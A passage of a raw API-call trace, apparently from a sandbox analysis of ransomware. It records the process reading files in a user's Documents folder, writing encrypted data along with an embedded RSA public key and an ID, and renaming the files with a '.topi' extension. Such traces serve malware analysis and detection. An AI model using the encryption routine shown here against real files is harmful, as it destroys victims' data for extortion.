GetLastError () returned 0x0 [0094.947] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.948] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.948] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.948] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.948] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x17060) returned 0x9a06a00 [0094.948] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6ebf30 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f15c0 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.949] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92a0 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9288 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.954] GetCurrentThreadId () returned 0x8c4 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5530 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.954] GetCurrentThreadId () returned 0x8c4 [0094.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92b8 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f15c0 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.958] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x17057, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x17057, lpOverlapped=0x0) returned 1 [0094.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.959] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1705c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.959] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.960] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.960] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.960] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.960] CloseHandle (hObject=0x6a8) returned 1 [0094.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.962] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cMmcblZ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cmmcblz.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cMmcblZ.pps.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cmmcblz.pps.topi")) returned 1 [0094.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.963] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.964] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ba9500, ftCreationTime.dwHighDateTime=0x1d569e3, ftLastAccessTime.dwLowDateTime=0x84393750, ftLastAccessTime.dwHighDateTime=0x1d592f6, ftLastWriteTime.dwLowDateTime=0x84393750, ftLastWriteTime.dwHighDateTime=0x1d592f6, nFileSizeHigh=0x0, nFileSizeLow=0x684c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cT9m.pptx", cAlternateFileName="CT9M~1.PPT")) returned 1 [0094.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b41c0 [0094.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cT9m.pptx") returned=".pptx" [0094.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cT9m.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ct9m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.965] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=26700) returned 1 [0094.965] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.968] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6826, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.968] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.969] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.969] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.969] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x684c, lpOverlapped=0x0) returned 1 [0094.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END 